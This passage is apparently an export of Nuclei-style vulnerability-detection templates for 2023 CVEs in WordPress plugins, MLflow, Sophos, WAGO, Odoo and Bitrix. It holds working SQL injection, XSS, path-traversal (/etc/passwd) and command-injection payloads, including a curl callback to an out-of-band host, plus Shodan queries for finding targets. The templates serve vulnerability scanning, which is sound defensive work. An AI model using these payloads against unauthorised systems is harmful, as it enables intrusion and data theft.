"CVE-2023-1020.yaml", "content": "id: CVE-2023-1020\n\ninfo:\n name: Steveas WP Live Chat Shoutbox <= 1.4.2 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n The Steveas WP Live Chat Shoutbox WordPress plugin through 1.4.2 does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\n remediation: |\n Versions through 1.4.2 are affected and none of the listed references cites a fixed release, so updating to 1.4.2 does not resolve the issue; deactivate and remove the plugin until a patched version is published.\n reference:\n - https://wpscan.com/vulnerability/4e5aa9a3-65a0-47d6-bc26-a2fb6cb073ff\n - https://wordpress.org/plugins/wp-shoutbox-live-chat/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1020\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1020\n cwe-id: CWE-89\n epss-score: 0.05497\n epss-percentile: 0.93034\n cpe: 
cpe:2.3:a:wp_live_chat_shoutbox_project:wp_live_chat_shoutbox:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wp_live_chat_shoutbox_project\n product: wp_live_chat_shoutbox\n framework: wordpress\n tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n action=shoutbox-ajax-update-messages&last_timestamp=0)+UNION+ALL+SELECT+NULL,NULL,(SELECT+CONCAT(0x6338633630353939396633643833353264376262373932636633666462323562)),NULL,NULL,NULL,NULL,NULL--+&rooms%5B%5D=default\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"c8c605999f3d8352d7bb792cf3fdb25b\"\n - \"no_participation\"\n condition: and\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100fac5c85ebe071ae5ef03e6745f869794a516d4dd1a7fd22f58ec3d490039c84c022100cafea571a15f3be63d57818f9c9386f1433fe77561b33395aeb30cde8b682100:922c64590222798bb761d5b6d8e72950", "hash": "7ce86054e6dee4269f312a60041782fe", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308601" }, "name": "CVE-2023-1080.yaml", "content": "id: CVE-2023-1080\n\ninfo:\n name: WordPress GN Publisher <1.5.6 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress GN Publisher plugin before 1.5.6 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could lead to the execution of arbitrary script code in the context of the affected website, potentially allowing an attacker to steal sensitive information or perform unauthorized actions.\n remediation: Fixed in version 1.5.6.\n reference:\n - https://wpscan.com/vulnerability/fcbcfb56-640d-4071-bc12-acac1b1e7a74\n - https://wordpress.org/plugins/gn-publisher/\n - https://www.wordfence.com/threat-intel/vulnerabilities/id/8a4ee97c-63cd-4a5e-a112-6d4c4c627a57\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1080\n - https://plugins.trac.wordpress.org/browser/gn-publisher/trunk/templates/settings.php#L70\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1080\n cwe-id: CWE-79\n epss-score: 0.0025\n epss-percentile: 0.64332\n cpe: cpe:2.3:a:gnpublisher:gn_publisher:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: gnpublisher\n product: gn_publisher\n framework: wordpress\n tags: cve2023,cve,wp-plugin,wordpress,gn-publisher,authenticated,wp,xss,wpscan,gnpublisher\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=gn-publisher-settings&tab=%22%2F+onmouseover%3Dalert%28document.domain%29%3B%2F%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"/ onmouseover=alert(document.domain);//\")'\n - 'contains(body_2, \"GN Publisher\")'\n condition: and\n# digest: 4b0a004830460221009e1ffc42fadc2223a2bde2cfca3d21b2ccb40f02c1ccf27a1ded4325da215dfb022100fd1a246c50613256dcd59279b3f0ea4fcde05ce171adfeabd1d5068a35986ed9:922c64590222798bb761d5b6d8e72950", 
"hash": "9799278f632002133876da66a6adfa41", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308602" }, "name": "CVE-2023-1177.yaml", "content": "id: CVE-2023-1177\n\ninfo:\n name: Mlflow <2.2.1 - Local File Inclusion\n author: iamnoooob,pdresearch\n severity: critical\n description: |\n Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \\..\\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation could allow an attacker to read sensitive files on the server.\n remediation: |\n Upgrade Mlflow to version 2.2.1 or later to mitigate the vulnerability.\n reference:\n - https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/\n - https://github.com/mlflow/mlflow/commit/7162a50c654792c21f3e4a160eb1a0e6a34f6e6e\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1177\n - https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1177\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1177\n cwe-id: CWE-29,CWE-22\n epss-score: 0.02668\n epss-percentile: 0.89327\n cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: lfprojects\n product: mlflow\n shodan-query: http.title:\"mlflow\"\n tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects\n\nhttp:\n - raw:\n - |\n POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json; charset=utf-8\n\n {\"name\":\"{{randstr}}\"}\n - |\n POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json; charset=utf-8\n\n {\"name\":\"{{randstr}}\",\"source\":\"file:///etc/\"}\n - |\n GET 
/model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - '\"version\": \"([0-9.]+)\",'\n internal: true\n part: body\n# digest: 4b0a00483046022100d755ca22bd1d15b3e2037d22374fbe60d7b1db9c35cc6a4cad95e1b57c88d42a022100c8c05dd9d1b11648b906d574c3f74255eabdd64d0283c45bb8dac0ee7c66c3cc:922c64590222798bb761d5b6d8e72950", "hash": "c34cb9219b3ab6e66d9498e04b3b3bc4", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308603" }, "name": "CVE-2023-1263.yaml", "content": "id: CVE-2023-1263\n\ninfo:\n name: Coming Soon & Maintenance < 4.1.7 - Unauthenticated Post/Page Access\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not restrict access to published and non protected posts/pages when the maintenance mode is enabled, allowing unauthenticated users to access them.\n remediation: Fixed in version 4.1.7\n reference:\n - https://wpscan.com/vulnerability/2e07ffd9-8e82-4078-96aa-162ef78c417b\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1263\n - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cmp-coming-soon-maintenance/cmp-coming-soon-maintenance-plugin-by-niteothemes-416-information-exposure\n - https://wordpress.org/plugins/cmp-coming-soon-maintenance/\n - https://plugins.trac.wordpress.org/browser/cmp-coming-soon-maintenance/tags/4.1.6/niteo-cmp.php#L2759\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2023-1263\n cwe-id: CWE-200\n epss-score: 0.00238\n epss-percentile: 0.61195\n cpe: cpe:2.3:a:niteothemes:coming_soon_\\&_maintenance:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: niteothemes\n product: coming_soon_\\&_maintenance\n framework: wordpress\n 
publicwww-query: \"/wp-content/plugins/cmp-coming-soon-maintenance/\"\n tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth,niteothemes\n\nhttp:\n - raw:\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=cmp_get_post_detail&id=1\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"img\":'\n - '\"date\":'\n - '\"title\":'\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022011e5f903b0a93f9e3c06ec147cc8c3f99a9d83b16945cc273a867de1c81ea74e0221009f399c551bcf521294a213c1b973399eb02bea51059fdf559b11acf56aff52ac:922c64590222798bb761d5b6d8e72950", "hash": "cd2f590b25c2a4c97bc2d09492bbf553", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308604" }, "name": "CVE-2023-1362.yaml", "content": "id: CVE-2023-1362\n\ninfo:\n name: unilogies/bumsys < v2.0.2 - Clickjacking\n author: ctflearner\n severity: medium\n description: |\n This template checks whether the X-Frame-Options header is absent from the HTTP response of a page identified as BUMSys, to identify the improper restriction of rendered UI layers or frames in the GitHub repository unilogies/bumsys prior to version 2.0.2. A Content-Security-Policy frame-ancestors directive is not evaluated, so a deployment protected only by CSP may be reported as a false positive; confirm manually before reporting.\n impact: |\n An attacker can trick users into performing unintended actions on the vulnerable application.\n remediation: |\n Upgrade to version 2.0.2 or later to mitigate the Clickjacking vulnerability.\n reference:\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1362\n - https://huntr.dev/bounties/e5959166-c8ef-4ada-9bb1-0ff5a9693bac/\n - https://github.com/unilogies/bumsys/commit/8c5b27d54707f9805b27ef26ad741f2801e30e1f\n - https://github.com/ctflearner/ctflearner\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1362\n cwe-id: CWE-1021\n epss-score: 0.00421\n 
epss-percentile: 0.71594\n cpe: cpe:2.3:a:bumsys_project:bumsys:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: bumsys_project\n product: bumsys\n tags: cve,cve2023,bumsys,clickjacking,huntr,bumsys_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\"\n\n matchers:\n - type: dsl\n dsl:\n - \"status_code_1 == 200\"\n - \"!regex('X-Frame-Options', header)\"\n - \"contains(body, 'BUMSys')\"\n condition: and\n# digest: 4b0a00483046022100db736e1f7e3b60b5cdc1776b06c2485456e5878e8fb3742146e4e593eeaa3f95022100f0fbea2cbfdb563686635b04f3c66d63dc0874d5c884e91e104af6118f8f9deb:922c64590222798bb761d5b6d8e72950", "hash": "0659401445eb334be615f61ae881393f", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308605" }, "name": "CVE-2023-1408.yaml", "content": "id: CVE-2023-1408\n\ninfo:\n name: Video List Manager <= 1.7 - SQL Injection\n author: r3Y3r53\n severity: high\n description: |\n The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin.\n reference:\n - https://wpscan.com/vulnerability/baf7ef4d-b2ba-48e0-9c17-74fa27e0c15b\n - https://wordpress.org/plugins/video-list-manager/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1408\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2023-1408\n cwe-id: CWE-89\n epss-score: 0.01339\n epss-percentile: 0.84615\n cpe: cpe:2.3:a:video_list_manager_project:video_list_manager:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: video_list_manager_project\n product: video_list_manager\n framework: wordpress\n publicwww-query: /wp-content/plugins/video-list-manager/\n tags: cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: 
application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n @timeout: 15s\n GET /wp-admin/admin.php?page=tnt_video_edit_page&videoID=SLEEP(7) HTTP/1.1\n Host: {{Hostname}}\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=7'\n - 'status_code_2 == 200'\n - 'contains_all(body_2, \"Edit Video\",\"Youtube\")'\n condition: and\n# digest: 490a004630440220557189f3aeda3c74e23c7c2eafca9a9ffd0d874f4c21f4998f0fa7da5b3d34390220535b42e7ed0a6ca565fbab863cb242ca58ab68d291a3470b7e8c5d54ebf0de30:922c64590222798bb761d5b6d8e72950", "hash": "6e384ac0fe4bc3555bb93da4dc1fd334", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308606" }, "name": "CVE-2023-1434.yaml", "content": "id: CVE-2023-1434\n\ninfo:\n name: Odoo - Cross-Site Scripting\n author: DhiyaneshDK\n severity: medium\n description: |\n Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix this vulnerability.\n reference:\n - https://www.sonarsource.com/blog/odoo-get-your-content-type-right-or-else\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1434\n classification:\n cve-id: CVE-2023-1434\n cwe-id: CWE-79\n metadata:\n verified: true\n max-request: 1\n shodan-query: title:\"Odoo\"\n tags: cve2023,cve,odoo,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/web/set_profiling?profile=0&collectors=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 
'\"params\":'\n - 'session'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221009f88c973f15e82b4aad7aedc75098b0daca742aa8b6fe3cfb11e203d2306539b022050fd604d6227ce671990eaac0780f3c69d00cd07567190bf96d24b10177fddb3:922c64590222798bb761d5b6d8e72950", "hash": "519b0a8d7a78402a5b968e8f08b84d3b", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308607" }, "name": "CVE-2023-1454.yaml", "content": "id: CVE-2023-1454\n\ninfo:\n name: Jeecg-boot 3.5.0 qurestSql - SQL Injection\n author: DhiyaneshDK\n severity: critical\n description: |\n A vulnerability classified as critical has been found in jeecg-boot 3.5.0. This affects an unknown part of the file jmreport/qurestSql. The manipulation of the argument apiSelectId leads to sql injection. It is possible to initiate the attack remotely.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade Jeecg-boot to a patched version or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/Sweelg/CVE-2023-1454-Jeecg-Boot-qurestSql-SQLvuln/tree/master\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1454\n - https://vuldb.com/?ctiid.223299\n - https://vuldb.com/?id.223299\n - https://github.com/Awrrays/FrameVul\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1454\n cwe-id: CWE-89\n epss-score: 0.04509\n epss-percentile: 0.92282\n cpe: cpe:2.3:a:jeecg:jeecg-boot:3.5.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: jeecg\n product: jeecg-boot\n shodan-query: http.favicon.hash:1380908726\n tags: cve2023,cve,jeecg,sqli\n\nhttp:\n - raw:\n - |\n POST /jeecg-boot/jmreport/qurestSql HTTP/1.1\n Host: {{Hostname}}\n 
Content-Type: application/json;charset=UTF-8\n\n {\"apiSelectId\":\"1316997232402231298\",\"id\":\"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"SQLException\"\n - \"XPATH syntax error:\"\n condition: and\n\n - type: word\n part: header\n words:\n - application/json\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - \"XPATH syntax error: '([a-z_@%]+)'\"\n - \"XPATH syntax error: '([a-z- @%]+)'\"\n - \"XPATH syntax error: '([a-z@%0-9.]+)'\"\n part: body\n# digest: 490a0046304402201617c97220bd0ac605e36efc6731e6e680ab819a2d613804423de883aba8d1eb0220562bcbd34db0c1ce70cd835193e6819e76e7cef2925feda6621420165482860b:922c64590222798bb761d5b6d8e72950", "hash": "d7339b54abe9b996108b9428c3c55802", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308608" }, "name": "CVE-2023-1496.yaml", "content": "id: CVE-2023-1496\n\ninfo:\n name: Imgproxy < 3.14.0 - Cross-site Scripting (XSS)\n author: pdteam\n severity: medium\n description: Cross-site Scripting (XSS) - Reflected in GitHub repository imgproxy/imgproxy prior to 3.14.0.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: |\n Upgrade to Imgproxy version 3.14.0 or later to mitigate this vulnerability.\n reference:\n - https://github.com/imgproxy/imgproxy/commit/62f8d08a93d301285dcd1dabcc7ba10c6c65b689\n - https://huntr.dev/bounties/de603972-935a-401a-96fb-17ddadd282b2\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2023-1496\n cwe-id: CWE-79\n epss-score: 0.00085\n epss-percentile: 0.34963\n cpe: cpe:2.3:a:evilmartians:imgproxy:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n 
vendor: evilmartians\n product: imgproxy\n shodan-query: \"Server: imgproxy\"\n tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/unsafe/plain/https://cve-2023-1496.s3.amazonaws.com/imgproxy_xss.svg\"\n\n matchers:\n - type: dsl\n dsl:\n - contains(body, 'PC9zdmc+#test')\n - status_code == 200\n condition: and\n\n extractors:\n - type: dsl\n dsl:\n - content_security_policy\n# digest: 4a0a0047304502202ad789f0ac262a3012d88a82fabcb0495918466b6945c80a40a9cf0f17501756022100fcd6b4965a63afc6ed0a5933664366f832ca12cc04bd2e4809dbd1fec88dc51b:922c64590222798bb761d5b6d8e72950", "hash": "a5fbe66cdf14b9a223dbbd63bc7d4118", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308609" }, "name": "CVE-2023-1546.yaml", "content": "id: CVE-2023-1546\n\ninfo:\n name: MyCryptoCheckout < 2.124 - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n The MyCryptoCheckout WordPress plugin before 2.124 does not escape some URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 2.124\n reference:\n - https://wpscan.com/vulnerability/bb065397-370f-4ee1-a2c8-20e4dc4415a0\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1546\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-1546\n cwe-id: CWE-79\n epss-score: 0.00071\n epss-percentile: 0.29221\n cpe: cpe:2.3:a:plainviewplugins:mycryptocheckout:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: plainviewplugins\n product: mycryptocheckout\n framework: wordpress\n tags: 
cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated,plainviewplugins\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/options-general.php?page=mycryptocheckout&tab=autosettlements&\"> HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"scriptalert(/XSS/)/script\")'\n - 'contains(body_2, \"mycryptocheckout\")'\n condition: and\n# digest: 490a00463044022018d8d859d1510e71d41e4dcab2713a5820907e67c0445dd0ecdb4500c0fa6b730220327729b1610301143ba6cbd8037ecece03bc57e6fcd4ce7118478ec6102d864a:922c64590222798bb761d5b6d8e72950", "hash": "94ec91136bc49d78eec8019399ea9ea0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860a" }, "name": "CVE-2023-1671.yaml", "content": "id: CVE-2023-1671\n\ninfo:\n name: Sophos Web Appliance - Remote Code Execution\n author: Co5mos\n severity: critical\n description: |\n A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability.\n reference:\n - https://vulncheck.com/blog/cve-2023-1671-analysis\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1671\n - http://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.html\n - https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce\n - https://github.com/lions2012/Penetration_Testing_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1671\n cwe-id: 
CWE-77\n epss-score: 0.96156\n epss-percentile: 0.99469\n cpe: cpe:2.3:a:sophos:web_appliance:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sophos\n product: web_appliance\n shodan-query: title:\"Sophos Web Appliance\"\n fofa-query: title=\"Sophos Web Appliance\"\n tags: cve2023,cve,packetstorm,rce,sophos,oast,kev\n\nhttp:\n - raw:\n - |\n POST /index.php?c=blocked&action=continue HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n args_reason=filetypewarn&url={{randstr}}&filetype={{randstr}}&user={{randstr}}&user_encoded={{base64(\"\\';curl http://{{interactsh-url}} #\")}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: curl\"\n# digest: 4a0a00473045022100ae0e465ec75fd0a4861424e3aad7f02640cf6221038527efafe82c6742e6737002206c97e80f7b304f7c6b2617847d8a6c3bc6133ac27161b8921c0781f00317ca0d:922c64590222798bb761d5b6d8e72950", "hash": "5c93a38a39b07e5abbe3245bc1b4f4bd", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860b" }, "name": "CVE-2023-1698.yaml", "content": "id: CVE-2023-1698\n\ninfo:\n name: WAGO - Remote Command Execution\n author: xianke\n severity: critical\n description: |\n In multiple products of WAGO, a vulnerability allows an unauthenticated, remote attacker to create new users and change the device configuration which can result in unintended behavior, Denial of Service, and full system compromise.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.\n remediation: |\n Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://onekey.com/blog/security-advisory-wago-unauthenticated-remote-command-execution/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1698\n - 
https://cert.vde.com/en/advisories/VDE-2023-007/\n - https://github.com/codeb0ss/CVE-2023-1698-PoC\n - https://github.com/deIndra/CVE-2023-1698\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1698\n cwe-id: CWE-78\n epss-score: 0.55051\n epss-percentile: 0.97591\n cpe: cpe:2.3:o:wago:compact_controller_100_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: wago\n product: compact_controller_100_firmware\n shodan-query: html:\"/wbm/\" html:\"wago\"\n tags: cve2023,cve,wago,rce\n\nhttp:\n - raw:\n - |\n POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n {\"package\":\";id;#\"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"license\":'\n - '\"name\":'\n - 'uid='\n - 'gid='\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b407d13bb092bfd293626f93b9765b760fc504f78be29190689950f60041a7bf02200e23d21826874028db946e7c4a4af5e0b05de0bed54232eb4b63c39eb70fe3aa:922c64590222798bb761d5b6d8e72950", "hash": "4ed98c01424f8c98aebc2b96b523ca73", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860c" }, "name": "CVE-2023-1719.yaml", "content": "id: CVE-2023-1719\n\ninfo:\n name: Bitrix Component - Cross-Site Scripting\n author: DhiyaneshDk\n severity: critical\n description: |\n Global variable extraction in bitrix/modules/main/tools.php in Bitrix24 22.0.300 allows unauthenticated remote attackers to (1) enumerate attachments on the server and (2) execute arbitrary JavaScript code in the victim’s browser, and possibly execute arbitrary PHP code on the server if the victim has administrator privilege, via overwriting uninitialised variables.\n reference:\n - https://starlabs.sg/advisories/23/23-1719/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1719\n - https://github.com/20142995/sectool\n 
classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-1719\n cwe-id: CWE-665\n epss-score: 0.02807\n epss-percentile: 0.90415\n cpe: cpe:2.3:a:bitrix24:bitrix24:22.0.300:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: bitrix24\n product: bitrix24\n shodan-query: html:\"/bitrix/\"\n tags: cve2023,cve,bitrix,xss,bitrix24\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/bitrix/components/bitrix/socialnetwork.events_dyn/get_message_2.php?log_cnt=\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"'LOG_CNT':\"\n - \"\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100ee017b54c73c0f61455fa03bda991d45a439666dd9865e87ae61054c61089562022036a61ac1c74ee4bdc735c1e9d6eedb6e2c5cb5f2df88ed4c4e65875d66e4f091:922c64590222798bb761d5b6d8e72950", "hash": "d805d46a2127c08af463565bdb9bbd39", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30860d" }, "name": "CVE-2023-1730.yaml", "content": "id: CVE-2023-1730\n\ninfo:\n name: SupportCandy < 3.1.5 - Unauthenticated SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n The SupportCandy WordPress plugin before 3.1.5 does not validate and escape user input before using it in an SQL statement, which could allow unauthenticated attackers to perform SQL injection attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version 3.1.5\n reference:\n - https://wpscan.com/vulnerability/44b51a56-ff05-4d50-9327-fc9bab74d4b7\n - https://wordpress.org/plugins/supportcandy/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-1730\n - https://github.com/tanjiti/sec_profile\n classification:\n cvss-metrics: 
